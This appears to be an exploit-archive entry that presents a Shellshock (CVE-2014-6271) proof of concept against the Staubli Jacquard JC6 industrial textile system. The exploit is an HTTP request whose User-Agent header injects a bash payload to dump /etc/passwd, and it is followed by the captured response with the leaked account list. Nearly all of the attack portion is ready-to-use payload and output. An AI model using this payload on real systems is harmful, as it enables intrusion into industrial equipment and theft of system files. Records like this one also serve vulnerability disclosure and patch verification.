Staubli Jacquard Industrial System JC6 suffers from a bash environment variable handling code injection vulnerability.
ab496b513ca8eb64b58bc9279627e7c5
# Exploit Title: Staubli Jacquard Industrial System | GNU Bash Environment
Variable Handling Code Injection (Shellshock)
# Date: 21.09.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.staubli.com
# Software Link:
https://www.staubli.com/tr-tr/textile/textile-machinery-solutions/
# Version:JC6
# CVE: CVE-2014-6271
# Tested on: Linux
----------------------------#PoC#----------------------------
--------------> Request
GET / HTTP/1.1 Host: TargetIP User-Agent: () { test;};echo \"Content-type:
text/plain\"; echo; echo; echo $(</etc/passwd) Pragma: no-cache Accept:
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
--------------> Response
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf8">
<link href="/staubli.css" rel="stylesheet" type="text/css">
<title>root:!:0:0::/:/usr/bin/ksh daemon:!:1:1::/etc: bin:!:2:2::/bin:
sys:!:3:3::/usr/sys: adm:!:4:4::/var/adm: uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest: nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/: lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh nuucp:*:6:5:uucp login
user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
paul:!:201:1::/home/paul:/usr/bin/ksh jdoe:*:202:1:John
Doe:/home/jdoe:/usr/bin/ksh</title>
</head>
<frameset rows="10%,90%" border=0>
<frameset cols="25%,75%" border=0>
<frame src="logo.html" name="logo" scrolling="no">
<frame src="/cgi-bin/title.cgi" name="title">
</frameset>
<frameset cols="25%,75%" border=0>
<frame src="menu_main.shtml" name="menu">
<frame src="main.shtml" name="main">
</frameset>
</frameset>
<noframe>
<body id="main">
Sorry your navigator doesn't accept frame.
</body>
</noframe>
</html>